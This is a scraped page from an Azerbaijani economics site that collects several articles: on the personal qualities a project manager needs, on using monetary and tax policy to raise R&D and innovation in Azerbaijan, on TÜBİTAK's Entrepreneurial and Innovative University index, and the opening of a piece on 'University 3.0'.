Exact matches only
Search in title
Search in content
Search in posts
Search in pages
Filter by Categories
Ailə təsrrüfatı
Bank və Sığorta
Beynəlxalq İqtisadiyyat
Bilik Iqtisadiyyatı
diskurs.az radio unec
Dünya İqtisadi Forumu
Fiskal Siyasət
İnforqrafika
İnnovasiya
ISE Economic Talks
Made in Azerbaijan
Makroiqtisadi təhlil
Maliyyə bazarları
Marketinq
Milli iqtisadiyyat
Müsahibə
Neft
Nəqliyyat
Nəqliyyat
Qender
Sahibkarlıq
Sənaye
Turizm
Vergi və Rüsumlar
Домохозяйства
İqtisadi Təhsil
USD 1.7000, EUR 1.9343, TRY 0.2909, RUB 0.0254, CNY 0.2469, GEL 0.6589, GBP 2.1630, IRR 0.0040, JPY 1.5333, XAU 2000.3730, XAG 24.9162, XPT 1325.6940, XPD 1518.7545
Layihə menecerindən tələb olunan 8 şəxsi keyfiyyət
HEAD-10-things-to-consider-when-choosing-project-management-software

Layihə menecerindən tələb olunan 8 şəxsi keyfiyyət

Şirkətlərdə həyata keçirilən layihələrin uğurla başa çatması üçün bir çox faktor var; ali rəhbərliyin layihəni dəstəkləməsi, maraqlı tərəflərin və işçilərin layihəni mənimsəməsi, maliyyə və insan resursları ilə bağlı layihəyə lazımi dəstəklərin verilməsi və s.

Ancaq, layihənin əvvəldən axıra qədər arzu edilən şəkildə getməsini təmin edəcək olan şəxs layihə meneceridir. Nəticədə, bizim kimi bir insan olan layihə menecerində axtarılan bəzi fərdi xüsusiyyətlər vardır. Məhz bu xüsusiyyətlər ilə layihə meneceri digər idarəçilərdən sıyrıla və layihəni uğurla başa vurmaqda bir addım qabağa keçə bilər. Müxtəlif ədəbiyyatlarda bəzi kiçik dəyişikliklər olsa da layihə menecerindən tələb olunan aşağıdakı əsasən səkkiz xüsusiyyətin adı çəkilir:

  1. Müştəri yönümlü olmaq:

Hər layihənin mütləq müştərisi vardır. Müştəri təşkilatın daxilində ola biləcəyi kimi təşkilatın xaricində yaxud, hər ikisi birdən də ola bilər. Uğurlu layihə menecerləri müştərini daima ön planda tutar. Müştərini diqqətlə dinləyər, istəklərini və tələblərini layihə komandası ilə birlikdə analiz edər və lazımi dəyişiklikləri həyata keçirər. Müştəridən gələn dəyişiklik tələbləri layihənin hər mərhələsində ola bilər. Layihənin sonuna doğru gələn dəyişiklik tələbləri isə təbii ki, layihədə daha çox iş, insan resursu və vəsait itkisinə yol aça biləcəyi kimi xərcin artımına da səbəb ola bilər. Buna görə müştərinin dəyişiklik tələbləri, layihənin xüsusi dəyişikliyə nəzarət qrupu tərəfindən dəyərləndirilməli və buradan çıxan qərara əsasən dəyişiklik tətbiq olunmalı və ya rədd edilməlidir.

  1. Planlaşdırma bacarığı:

Layihə meneceri layihəyə başlamazdan əvvəl ediləcəyi işlər (İR idarə edilməsi sahəsində), fəaliyyətlər (Fəaliyyət siyahısı üzərində) və 3 əsas ünsür olan “Əhatə dairəsi, Zaman və Xərc Planlarını” təşkil etməkdir. Layihənin tam və effektiv icrasında ilk addım yüksək səviyyəli və yüksək dəqiqliyə malik layihə planı yaratmaqdır.

Layihə planı meydana gətirərkən maraqlı tərəflərlə mümkün olduğu qədər çox danışıqlar aparılmalı “Beyin Fırtınası” və “Delphi texnikası” kimi texnikalarla planın son variantı hazırlamalıdır.

Əgər layihə meneceri, layihənin icrasına keçmədən əvvəl planı bitirə bilmir və icra ediləcək işləri bilmirsə, maraqlı tərəflər də lazımlı məlumatları ala bilmirsə ən son çarə olaraq “Mərhələli inkişaf” üsulunu tətbiq edilir. Bu sayədə layihənin icrası mərhələsində belə layihə planı yenilənir.

  1. Elastiklik və həllə fokuslanmaq:

Həllə fokuslanmaq layihənin icrası prosesində layihə menecerinin ehtiyacı olan ən mühüm xüsusiyyətdir. Çünki, ortaya çıxan problemlər qarşısında layihə meneceri əvvəlcədən hazırlamış olduğu layihə planına baxmalı, təyin olunmamış risk və ya problem qarşısında mümkün həll istiqamətində ən uyğun gələn cavabı verə bilməlidir.

Həllə fokuslanmaq, layihəni yaşanan çətinliklərdən çıxarmaqla yanaşı hədəflər istiqamətində qərarlı şəkildə bir addım daha atılmasını təmin edir. Layihə meneceri elastik olması sayəsində, dəyişən şərtlərə və vəziyyətə dərhal reaksiya göstərərək uyğunlaşa bilməlidir.

  1. Ünsiyyət və empatiya bacarığı:

Layihə menecerinin bəlkə də ən çox ehtiyac duyacağı xüsusiyyət budur. Çünki, layihə menecerinin işi 80-90%  nisbətində “Effektiv ünsiyyət”dir.

Ünsiyyətin təsirli olması çox vacibdir. Çünki, layihə meneceri bütün maraqlı tərəfləri çox yaxşı dinləməli, nəyə ehtiyac olduğunu anlamalı, maraqlı tərəfləri güc-gəlir cədvəlinə uyğun şəkildə yerləşdirməlidir.

Layihə kommunikasiyası, layihənin bütün maraqlı tərəfləri ilə mütəmadi ünsiyyətdə olmağı zəruri edir. Empatiya qurmaq Layihə menecerini bir addım irəliyə aparacaq. Bu xüsusiyyət sayəsində menecer maraqlı tərəfləri daha yaxşı anlayacaq və problemlərin əsl qaynağının nə olduğunu daha dəqiq şəkildə ortaya qoyacaq.

  1. Özünə güvənmək və liderlik:

Layihə meneceri, layihənin hər mərhələsində layihəyə olan bağlılığı və marağını yüksək səviyyədə saxlamalıdır. Layihə meneceri layihəyə nə qədər güvənirsə maraqlı tərəflər və layihə komandasında layihənin hədəflərinə olan inanc da düz mütənasib olaraq artır. Layihəyə güvənməyin ilk addımı da layihə menecerinin özünə olan güvənindən asılıdır.

Layihə meneceri liderlik qabiliyyətindən istifadə edərək maraqlı tərəfləri və komandanı layihənin hədəflərinə istiqamətləndirə və cəsarətləndirə bilər. Layihə meneceri klassik müdir xüsusiyyətindən azad olub kütlələri ardınca apara bilən liderlik xüsusiyyətinə sahib olmalıdır.

  1. Qazan – qazan prinsipinə fokuslanmaq:

Layihə meneceri, layihədə maraqlı tərəflərin hər birinin ayrı-ayrı istəkləri olduğunu və layihədən özlərinə uyğun müxtəlif gözləmələri olduğunu bilməlidir.

Bu səbəblə, layihənin icrası mərhələsində bəzən maraqlı tərəflər arasında qarşıdurmalar, mübahisələr yaranacaq. Maraqlı tərəflərin hər biri öz funksional işləri baxımından ən yaxşı nədirsə onu müdafiə edəcəkdir.

Layihə meneceri bu cür mübahisələrin normal bir proses olduğunu qəbul etməli və maraqlı tərəflər arasında ən uyğun həll metodunu müəyyən etməlidir. Hər şeydən əvvəl LM (layihə meneceri), problemlə üzləşməli və sonra da hər iki tərəfin xeyrinə olacaq şəkildə (qazan-qazan metodu) müzakirəni idarə etməlidir. Buradakı ən son variant məcburiyyət üsulu ilə son qərarı LM-nin özünün verməsidir.

  1. Şəffaflıq və dərs almaq:

Uğurlu LM-i, layihəsinin müvəffəqiyyətlə sona çatması üçün əvvəllər icra edilmiş bənzər layihələrin formalarından nümunə olaraq istifadə edə bilər. Əvvəlki layihənin rəhbəri ilə ünsiyyət quraraq öz layihəsinə uyğunlaşdırma edə bilər. Layihə meneceri dürüstlüyü, şəffaflığı ilə bütün maraqlı tərəflər üçün nümunə olmalıdır. Bundan başqa layihənin cari vəziyyəti haqqında hesabatlar ilə layihə barəsində məlumatları bütün maraqlı tərəflərə bərabər səviyyədə paylaşılması layihənin düzgün formada irəliləməsi üçün çox əhəmiyyətlidir. Bu səbəbdən məlumatların paylanması və maraqlı tərəflərin gözləmələrinin idarə olunması proseslərinə maksimum dərəcədə diqqət yetirilməlidir.

  1. Nəzarət və koordinasiya bacarığı:

Uğurlu layihə meneceri daima layihəsinin əsas planlarına (Əhatə dairəsi, Zaman, Xərc) nəzarət edir. Layihənin hər bir mərhələsində bu planları hədəflərlə müqayisə edərək qazanılmış dəyər metodunu həyata keçirir. Bu texnika ilə layihənin hədəflərdən nə qədər uzaqlaşdığını görə bilərsiniz. Variasiya analizi ilə də faktiki vəziyyət və hədəf arasındakı fərq müəyyən edilir.

Bu nəzarət sayəsində layihəyə erkən müdaxilə etmək mümkündür. Layihə meneceri, maraqlı tərəflər arasında, qruplar arasında, sponsor və müştəri ilə görüşlər də daxil olmaqla həmişə koordinasiya və təşkilati bacarıqlarından istifadə edir. Layihənin koordinasiya edilməsi yolu ilə görüşlər və işlər aparılır, layihə üçün mühüm qərarlar verilir. Layihənin uğurla başa çatması layihə menecerinin koordinasiya qabiliyyəti ilə birbaşa əlaqəlidir.

 

Mənbəə: https://omurbenek.com/

 

Fərrux Rəhimov – Azərbaycan Dövlət Aqrar Universiteti.

 

AZƏRBAYCANDA İNNOVASİYA FƏALLIĞININ STİMULLAŞDIRILMASI YOLLARI
SME

Salman Əli oglu Nəcəfov
salman.alioglu@gmail.com,

Əliağa Əliəsgər oğlu Qasımov
gasimovaliaga@gmail.com,

AZƏRBAYCANDA İNNOVASİYA FƏALLIĞININ
STİMULLAŞDIRILMASI YOLLARI
Açar sözlər: innovasiya, tədqiqat və işləmə xərcləri
Keywords: innovation, R&D
Ключевые слова: инновация, затраты на исследования и разработки

Son illərdə dünya iqtisadiyyatında baş verən mənfi tendensiyalar və dünya bazarlarında neft qiymətinin kəskin azalması Azərbaycanda bir sıra islahatların həyata keçirilməsini zəruriləşdirmişdir. Bu səbəbdən də ölkəmizdə bir çox prioritet sahələri əhatə edən strateji yol xəritələrinin hazırlanması iqtisadiyyatda və ixracda qeyri-neft sektorunun payının artırılması məqsədi daşıyır. Strateji yol xəritələrində nəzərdə tutulmuş tədbirlərdən biri ölkədə innovasiya və biliklər iqtisadiyyatının inkişafı və onun maliyyələşmə imkanlarının genişləndirilməsidir. Bu da gözlənilməz deyildir. Çünki, hal-hazırda istehsalın ənənəvi faktorları olan əmək, kapital, xammal və sahibkarlıq öz əhəmiyyətini saxlamasına baxmayaraq, bilik və innovasiya iqtisadi artım, yeni dəyər yaradılması və rəqabət qabiliyyətliliyinin artırılmasında əsas faktor hesab olunur.
Dünya praktikasına nəzər yetirdikdə aydın olur ki, ölkədə innovasiya fəallığının inkişafının əsasını tədqiqat və işləmələrə böyük məbləğdə maliyyə vəsaitinin ayrılması təşkil edir. Bu məqsədlə ölkələrin inkişaf səviyyələrini, tədqiqat və işləmə xərclərinin ÜDM-də payını araşdırdıqda bu iki göstərici arasında asılılığın olması sübuta yetirilir. Belə ki, statistik məlumatlara əsasən dünyanın inkişaf etmiş ölkələrində tədqiqat və işləmələrə ayrılan maliyyə vəsaiti 3-4% arasındadır. Şərqi Avropa ölkələrində isə bu göstərici təqribən 1-2,5% arasında dəyişir. MDB ölkələrinin əksəriyyətində isə bu rəqəm 0,1-1% arasındadır: Rusiyada 1,1%, Ukraynada 0,6%, Belarusda 0,5% və Moldovada isə 0,4%-dir. Ölkəmizdə isə bu göstərici 2010-cu ildən bəri təqribən 0,22%-dir. Göründüyü kimi, dünyanın bir çox ölkələri ilə müqayisədə Azərbaycanda tədqiqat və işləmələrə ayrılan ümumi maliyyə vəsaiti çox aşağı səviyyədədir. Bu da innovasiya və biliklər iqtisadiyyatının sürətli inkişafına mənfi təsir göstərir.
Lakin bir faktı qeyd etmək lazımdır ki, ölkə üzrə ümumi tədqiqat və işləmə xərcləri əsasən üç sektor üzrə formalaşır: dövlət, biznes və ali təhsil. Aparılmış tədqiqatlardan aydın olur ki, yüksək gəlirli və əksər Şərqi Avropa ölkələrində tədqiqat və işləmələrə çəkilən xərclərin sektorlar üzrə bölgüsündə biznes sektoru aparıcı rola malikdir (ümumi məbləğin təqribən 60-80%-i). Azərbaycanda isə tədqiqat və işləmə xərclərində biznes sektorunun payı aşağıdır (ölkəmizdə dövlətin payı 81%, biznesin payı 9% və ali təhsil sahəsinin payı 10%-dir). Buradan aydın olur ki, ölkəmizdə tədqiqat və işləmə xərclərinin azlığı biznes sektorunun bu sahəyə lazımi diqqət göstərmədiyindən yaranmışdır. Bu səbəbdən də ölkəmizdə tədqiqat və işləmə xərclərinin artırılması məqsədilə ilk növbədə biznes sektorunun bu sahəyə daha çox diqqət göstərməsinə çalışmaq lazımdır. Tədqiqat və işləmə xərclərinin artırılması biznesin texnoloji yenidən qurulmasını təmin edərək ölkənin rəqabət qabiliyyətliliyinin artmasına gətirib çıxaracaqdır.
Ölkədə biznesin innovasiya fəallığının zəif olmasının əsas səbəblərindən biri qeyri-neft sektorunda investisiya mühitinin zəif olmasıdır. Belə ki, 2016-cı ildə ölkədə emal sənayesində əsas kapitala yönəldilmiş investisiyaların həcmi 424 mln. manat təşkil etmişdir ki, (diaqram 1) bu da emal sənayesinin texnoloji yenidən qurulması prosesini zəiflədir. Belə ki, 2016-cı ildə əsas sənaye-istehsal fondlarının yeniləşməsi əmsalı qida məhsullarının istehsalında 2%, hazır metal məmulatlarının istehsalında 1,8%, maşın və avadanlıqların istehsalında 1,7%, kimya sənayesində 0,7% təşkil etmişdir.
Mənbə: Azərbaycan Respublikasının Dövlət Statistika Komitəsi
Diaqram 1. Emal sənayesində əsas kapitala yönəldilmiş investisiyalar, mln. manat

Ölkədə biznesin investisiya-innovasiya fəallığının gücləndirilməsi müvafiq pul-kredit siyasətinin həyata keçirilməsini zəruri edir.
İnvestisiya-innovasiya modelinə keçiddə pul-kredit siyasətinin rolu
Azərbaycanda biznesin innovasiya fəallığına və texnoloji yenidən qurulmasına mane olan əsas monetar amillərdən aşağıdakı qeyd etmək olar:
 real sektorda faiz dərəcəsinin mənfəət normasından yüksək olması;
 depozitlərin dollarlaşma səviyyəsinin yüksək olması;
 “uzun” pulların qıtlığı;
 devalvasiya riskləri.
Bu problemlərin aradan qaldırılmasında Mərkəzi Bankın rolunu tədqiq edərək monetar siyasətin Avropa və ABŞ təcrübəsini nəzərdən keçirək.
Avropa Mərkəzi Bankının əsas hədəfi qiymət sabitliyinin təmin edilməsidir. Avropa Mərkəzi Bankı pulun neytrallığı konsepsiyasını əsas gətirərək hesab edir ki, Mərkəzi Bank pulun həcmini dəyişməklə istehsal həcminə təsir edə bilmir və bu səbəbdən Mərkəzi Bank iqtisadi artıma nail olmaq üçün qiymət sabitliyini təmin etməlidir.
ABŞ-da Mərkəzi Bank (FES) ikili mandata malikdir: aşağı inflyasiya təmin etmək və maksimal məşğulluğa nail olmaq. Burada FES-in keçmiş sədri Qrinspenin sözlərini göstərmək olar ki, o, demişdir: “İqtisadi tünəzzül şəraitində iqtisadi artıma nail olmaq inflyasiya ilə mübarizədən daha önəmlidir” (3).
Avropa Mərkəzi Bankından fərqli olaraq FES öz siyəsətində aşağıdakı məsələləri nəzərə alır:
 ÜDM boşluğu, yəni potensial ÜDM-lə faktiki ÜDM arasındakı fərq. Bu fərq yüksək olduqda FES stimullaşdırıcı siyasət həyata keçirir, faktiki ÜDM potensial ÜDM-ə yaxınlaşdıqda isə pul-kredit siyasətini sərtləşdirir.
 FES öz siyasətində monetar inflyasiya və qeyri-monetar inflyasiyanı fərqləndirir. Belə ki, FES xərclər inflyasiyası şəraitində tənəzzülün qarşısını almaq üçün stimullaşdırıcı monetar siyasət həyata keçirir
Hesab edirik ki, Strateji Yol xəritəsində müəyyən olunmuş hədəflərə nail olmaq üçün ölkənin Mərkəzi Bankının hədəfi kimi aşağı inflyasiya ilə yanaşı firmaların texnoloji yenidənqurulmasının stimullaşdırılması da müəyyən edilməlidir.
Firmaların texnoloji yenidənqurulmasına mane olan əsas monetar amillərdən biri faiz dərəcəsinin real sektorda mənfəət normasından yüksək olmasıdır.
Faiz dərəcəsinin mənfəət normasına qədər azalması stimullaşdırıcı pul-kredit siyasətinin həyata keçirilməsini nəzərdə tutur.
Stimullaşdırıcı pul-kredit siyasəti ilə əlaqədər bir sıra iradlar mövcuddur:
 Birinci irad ondan ibarətdir ki, ölkədə monetizasiya səviyyəsi (pul kütləsinin ÜDM-ə nisbəti) inkişaf etməkdə olan ölkələrin səviyyəsinə uyğundur;
 İkinci irad – inhisarlaşma, korrupsiya və sair problemlər şəraitində stimullaşdırıcı pul-kredit səyasəti real sektorun inkişafı ilə deyil, inflyasiya ilə müşayiət olunacaq.
İradlara cavab olaraq aşağıdakıları qeyd etmək istərdik:
 Monetizasiya səviyyəsini başqa ölkələrlə müqayisə edərkən xarici ticarət balansı və s. amillər nəzərə alınmalıdır. Belə ki, ölkədə qeyri-neft sektoru üzrə yüksək xarici ticarət kəsiri mövcuddur, bu da yüksək monetizasiyanı zəruri edir.
 Bum dövründə ölkədə inhisarlaşma və s. problemlərin mövcudluğuna baxmayaraq həmin illərdə pul kütləsinin artması kreditlərin artması, iqtisadi artım və aşağı inflyasiya ilə müşayiət olunurdu (diaqram 2-4). Yəni ölkənin təcrübəsi göstərir ki, inhisarlaşma və s. problemlər şəraitində stimullaşdırıcı monetar siyasətin səmərəliliyi azalsa da pul kütləsinin artması iqtisadi artımla müşayiət olunurdu.

Mənbə: Azərbaycan Respublikasının Mərkəzi Bankı
Diaqram 2. Azərbaycanda pul bazasının həcmi, manatla, mlrd. manat

Mənbə: Azərbaycan Respublikasının Dövlət Statistika Komitəsi
Diaqram 3. Azərbaycanda emal sənayesində artım tempi, %

Mənbə: Azərbaycan Respublikasının Mərkəzi Bankı
Diaqram 4. Azərbaycanda inflyasiya səviyyəsi, illik, %

İnflyasiya və devalvasiya risklərini azaltmaq yolları
 Stimullaşdırıcı monetar siyasətın inflyasiya risklərini minimallaşdırmaq üçün pul kütləsinin real sektora yönəldilməsinə nail olmaq zəruridir. Buna mərkəzləşdirilmiş vəsaitlərin (kredit və depozitlər) real sektoru kreditləşdirən banklara verilməsi vasitəsilə nail olmaq olar. Bu, həmçinin 1) “uzun” pulların qıtlığı və 2) depozitlərin dollarlaşması problemini aradan qaldıracaq.
 İdxalın liberallaşdırılması. İnflyasiya risklərini idxalın liberallaşdırılması vasitəsilə azaltmaq olar. Bu, qısamüddətli dövrdə ölkənin idxaldan asılılığını artırsa da hesab edirik ki, uzunmüddətli dövrdə stimullaşdırıcı monetar siyasət yerli istehsalçıların rəqabət qabiliyyətliliyini artıraraq idxaldan asılılığını azaltmağa imkab verəcək.
 Toynbi vergisi. Pulun valyuta bazarına axınının qarşısını Toynbi vergisi (yəni valyuta mübadilələrinin vergiyə cəlb olunması) vasitəsilə almaq olar.
Vergi siyasəti
İnnovasiyaların stimullaşdırılmasının digər mühüm aləti tədqiqat və işləmələrə çəkilən xərclərin vergidən azad edilməsidir. Vergilərin innovasiya fəallığına təsiri bir sıra ədəbiyyatda tədqiq edilir (1; 2, səh. 283-287). Tədqiqat və işləmələrə çəkilən xərclərinin vergidən azad olunması dünya təcrübəsində geniş istifadə olunur və bəzi ölkələrdə vergi güzəştləri 100%-dən yüksəkdir. Məsələn Avstraliyada tədqiqat və işləmələrə çəkilən vəsaitlərin 150%-i, Sinqapurda isə 200%-i vergidən azad olunur.
Nəticə
• Ölkədə biznesin innovasiya fəallığının zəif olmasının əsas səbəblərində biri qeyri-neft sektorunda investisiya mühitinin zəif olmasıdır
 Ölkədə biznesin texnoloji yenidən qurulmasının təmin edilməsi stimullaşdırıcı monetar siyasətin həyata keçirilməsini nəzərdə tutur.
 Stimullaşdırıcı monetar siyasətin inflyasiya və devalvasiya risklərinin azaldılması üçün pul kütləsinin real sektora yönəldilməsinə nail olmaq zəruridir. Buna mərkəzləşdirilmiş vəsaitlərin (kredit və depozitlər) real sektoru kreditləşdirən banklara verilməsi vasitəsilə nail olmaq olar, mərkəzləşdirilmiş vəsaitlərin real sektoru kreditləşdirən banklara verilməsi zəruridir. Bu, həmçinin depozitlərin dollarlaşması və “uzun” pulların qıtlığı problemini aradan qaldırmağa imkan verəcək
 Pulların valyuta bazarına axınının qarşısını valyuta mübadilələrinin vergiyə cəlb olunması vasitəsilə almaq olar.
 Firmaların innovasiya fəaalığının stimullaşdırılması üçün tədqiqat və işləmələrə çəkilən xərclərinin vergidən azad olunması məqsədəuyğundur.

Xülasə
Məqalədə göstərilir ki, ölkəmizdə tədqiqat və işləmə xərclərinin azlığı biznes sektorunun bu sahəyə lazımi diqqət göstərmədiyindən yaranmışdır. Müəlliflər vurğulayırlar ki, ölkəmizdə tədqiqat və işləmə xərclərinin artırılması məqsədilə ilk növbədə biznes sektorunun bu sahəyə daha çox diqqət göstərməsinə çalışmaq lazımdır. Məqalədə ölkə iqtisadiyyatının innovasiya modelinə keçidinin sürətlənməsində pul-kredit siyasətinin və vergi güzəştlərin rolu göstərilmişdir.
.
Ədabiyyat
1. Gentry, William, M., and R. Glenn Hubbard. 2000. “Tax Policy and Entrepreneurial Entry.” American Economic Review, 90(2): 283-287
2. Mukherjee, Abhiroop and Singh, Manpreet and Zaldokas, Alminas, Do Corporate Taxes Hinder Innovation? (May 25, 2016). Journal of Financial Economics (JFE), Forthcoming. Available at SSRN: https://ssrn.com/abstract=2585458;
3. Ловушка регулятора / “Эксперт” №3 (497)/ 23 января 2006

Uğurlu nəticə təşəbbüskarlıqdan başlayır.
sentyabr 6, 2017
0
Təşəbbüskar və Yenilikçi Universitet indeksiFərrux Rəhimov

Uğurlu nəticə təşəbbüskarlıqdan başlayır.

Elm və Texnologiya Baş İdarəsinin 23-cu konfransında qəbul edilən “Universitetlərdə innovasiya və təşəbbüskarlığın təşviqi məqsədiylə siyasət vasitələrinin inkişaf etdirilməsi” qərarı çərçivəsində Türkiyədə ilk dəfə 2012-ci ildə TÜBİTAK tərəfindən Təşəbbüskar və Yenilikçi Universitet indeksi hazırlanmışdır.

İndeks, universitetləri təşəbbüskarlıq və yenilikçilik performanslarına görə sıralayaraq, universitetlərarası təşəbbüskarlıq və yenilikçilik sahəsində rəqabətin artmasına və təşəbbüskarlıq ekosisteminin inkişafına təkan verir.

Təşəbbüskar və Yenilikçi Universitet indeksi universitetlərdə təşəbbüskarlıq və yenilikçilik fəaliyyətlərinin təşviq edilməsi məqsədi ilə hazırlanır. Bu səbəbdən bu indeks universitetlərin təhsil keyfiyyətinə görə sıralandığı siyahı və ya ən müvəffəqiyyətli universiteti ortaya qoyan bir sıralama hesab olunmur. Bu siyahı universitetləri təşəbbüskarlıq səviyyələrinə görə sıralayır.

Məlumat toplama prosesində TUBİTAK-a YÖK (Ali Attestasiya Komissiyası), Elm, Sənaye və Texnologiya Nazirliyi, Universitetlər, TPE (Patent İdarəsi), İqtisadi İnkişaf Nazirliyi, KOSGEB (Kiçik və Orta sahibkarlara dəstək fondu), TTGV (Türkiyə Texnologiya İnkişaf etdirmə Vəqfi) və TÜBA (Türkiyə Elmlər Akademiyası) dəstək vermişdir.

Təşəbbüskar və Yenilikçi Universitet indeksi 5 istiqamətdən ibarətdir. Bu istiqamətlər özündə 23 göstəricini birləşdirir.

 

Təşəbbüskar və Yenilikçi Universitet indeksi

İstiqamət 1: Elmi və Texnoloji Araşdırmaların səviyyəsi

(Xüsusi çəki : 20%)

1.1. Elmi nəşrlərin sayı

1.2. İstinadların sayı

1.3. Tədqiqat və inkişaf (Tə-İn) və innovasiya dəstək proqramlarından qrant almış layihələrin sayı

1.4. Tə-İn (tədqiqat və inkişaf) və innovasiya dəstək proqramlarından qazanılmış məbləğ

1.5. Milli və beynəlxalq elm mükafatların sayı

1.6. Doktoranturadan məzun olanların sayı

      İstiqamət 2: Əqli Mülkiyyət Hovuzu

(Xüsusi çəki: 15%)

2.1. Patent müraciətlərinin sayı

2.2. Patent şəhadətnamələrinin sayı

2.3. Faydalı model/sənaye dizayn sənədlərinin sayı

2.4. Beynəlxalq patent müraciətlərinin sayı

İstiqamət 3: Əməkdaşlıq və inteqrasiya

(Xüsusi çəki : 25%)

3.1. Universitet-sənaye əməkdaşlığı çərçivəsində icra edilən Tə-İn (tədqiqat və inkişaf) və innovasiya layihələrinin sayı

3.2. Universitet-sənaye əməkdaşlığı çərçivəsində icra edilən Tə-İn (tədqiqat və inkişaf) və innovasiya layihələrinə cəlb edilən məbləğ

3.3. Beynəlxalq əməkdaşlıq çərçivəsində icra edilən Tə-İn (tədqiqat və inkişaf) və innovasiya layihələrinin sayı

3.4. Beynəlxalq əməkdaşlıq çərçivəsində icra edilən Tə-İş və innovasiya layihələrindən əldə olunmuş məbləğ

3.5. Mübadilə proqramlarında iştirak edən professor-müəllim və tələbələrin sayı.

İstiqamət 4: Təşəbbüskarlıq və yenilikçilik mədəniyyəti

(Xüsusi çəki : 15%)

4.1. Bakalavr və magistr səviyyəsində təşəbbüskarlıq, texnologiya menecmenti və innovasiya menecmenti fənlərinin tədris saatı

4.2. Texnologiya Transfer Ofisi, texnopark, inkubasiya mərkəzləri və Texnologiya inkişaf mərkəzlərində tam ştat vahidi çalışan işçilərin sayı

4.3. Texnologiya Transfer Ofisinin varlığı

4.4. Kənardan dinləyici cəlb etməklə təşəbbüskarlıq, texnologiya menecmenti və innovasiya menecmenti fənləri üzrə kursların sayı

İstiqamət 5: Əməkdaşlıq və inteqrasiya

(Xüsusi çəki : 25%)

5.1. Alimlərin texnoparklarda, inkubasiya mərkəzlərində, Texnologiya mərkəzlərində səhmdarı və ya sahibi olduğu fəaliyyətdə olan firmaların sayı

5.2. Universitet tələbələrinin və ya son beş ildə məzun olanların texnoparklarda, inkubasiya mərkəzlərində, Texnologiya mərkəzlərində səhmdarı və ya sahibi olduğu fəaliyyətdə olan firmaların sayı

5.3. Alimlərin texnoparklarda, Texnologiya mərkəzlərində səhmdarı və ya sahibi olduğu  firmalarda işləyənlərin sayı

5.4. Sertifikat alan patent, faydalı model və ya sənaye dizaynlarının sayı

Dünyanın müxtəlif ölkələrində universitetləri dəyərləndirmək üçün bənzər adlarla tətbiq edilən təşəbbüskar və yenilikçi universitet indeksi get-gedə daha çox əhəmiyyət qazanır. Azərbaycanda hələlik bu indeks tətbiq olunmasa da sevindirici haldır ki Azərbaycan Dövlət Aqrar Universitetində son illərdə “təşəbbüskar və yenilikçi universitet” olmaq yolunda bəzi addımlar atılmağa başlanmışdır. Belə ki, universitetin maddi-texniki bazası gücləndirilmiş, yeni laboratoriya və tədris-təcrübə mərkəzləri yaradılmış, yeni kadrlar cəlb edilmiş, professor-müəllim heyətinin müxtəlif yerli və beynəlxalq kurs, seminar və konfranslarda iştirakı təmin edilmişdir. Menecment və marketinq ixtisaslarına bir ildir tədris edilən “Təşəbbüs və işgüzarlıq” fənni tələbə və müəllimlərin böyük marağına səbəb olmuş və növbəti tədris ilindən etibarən iqtisadiyyat və idarəetmə sahələri üzrə təhsil alan bütün tələbələrə adı çəkilən fənnin tədris edilməsinə qərar verilmişdir. Bu tədbirlərin davamı olaraq “Aqrobiznes inkubasiya mərkəzi”nin qurulması üçün fəaliyyətlər başlanmışdır. ADAU-da Təşəbbüskar və yenilikçi universitetlərin digər mühüm xüsusiyyətlərindən biri olan Differensial əmək haqqı sisteminə keçilməsi üçün də müzakirələr başlanmış və müəyyən işlər görülmüşdür. Dünya təcrübəsində, işçilərin əmək haqlarını onların xidməti fəaliyyət göstəricilərinə əsasən müəyyən edən hər növ sistemə xidməti fəaliyyətin qiymətləndirilməsinə əsaslanan əmək haqqı sistemi (ingiliscə-Performance Based Pay Systems və ya Performance-related pay) adı verilir. Bu tip sistemlər əsasən işçiləri motivasiya etmək və onların fəaliyyətini müəssisənin hədəfləri istiqamətində yönəltmək məqsədi daşıyır[2]. Azərbaycanda da bu cür əmək haqqı hesablanması ilə bağlı təcrübə var. Belə ki, Azərbaycan Dövlət İqtisad Universitetinin (UNEC) Elmi Şurasının qərarı ilə təsdiq olunan “Azərbaycan Dövlət İqtisad Universitetində professor-müəllim heyətinin xidməti fəaliyyətinin qiymətləndirilməsinə əsaslanan differensial əmək haqqı sisteminin tətbiqi haqqında Qaydalar”  təsdiq edilmişdir. Professor-müəllim heyətinin xidməti fəaliyyətinin qiymətləndirilməsi onların universitetdəki fəaliyyətinin üç əsas istiqaməti nəzərə alınmaqla həyata keçirilir: elmi fəaliyyətlər (40%), tədris fəaliyyətləri (40%) və özünü inkişaf fəaliyyətləri (20%) [3].

Bütün bu tədbirlərin tezliklə öz bəhrəsini verəcəyinə və ADAU-nun ölkənin və regionun öncül ali təhsil mərkəzlərindən biri olacağına inanırıq.

Ədəbiyyat

  1. TUBİTAK Girişimci ve Yenilikçi Üniversite Endeksi Gösterge Seti
  2. http://az.trend.az/azerbaijan/society/2454452.html
  3. Zahid F. Məmmədov “Differensial əmək haqqı sistemi UNEC-də tədris, elmi-tədqiqat və inzibati fəaliyyətin səmərəliliyini artıracaq”.

 

 

Fərrux Rəhimov – Menecment və aqrar marketinq kafedrasının assistenti, Tələbə Elmi Cəmiyyətinin sədri.

Üçüncü nəsil universitet və ya Universitet 3.0 nədir?
Universitet 3.0Universitet 3.0

Bu gün bütün dünyada ali təhsil qurumlarının yeniləndiyini və onlara qarşı gözləntilərdə dəyişikliklərin olduğunu müşahidə edirik. Bu yenilənməyə müxtəlif faktorlar  təsir etsə də fikrimizcə bunlardan ən mühümü formalaşmaqda olan informasiya cəmiyyəti və iqtisadiyyatıdır. Sənaye cəmiyyətindən informasiya cəmiyyətinə keçid və beynəlxalq münasibətlərdə baş verən dəyişikliklər nəticəsində “informasiya iqtisadiyyatı” nəzəriyyəsinin meydana çıxması  bu yeni ekosistemdə ali təhsilin əhəmiyyətini daha da artmışdır. Bunun əsas səbəbi şübhəsiz ki, yeni sistemdə informasiyanın önəminin daha da artmasıdır.

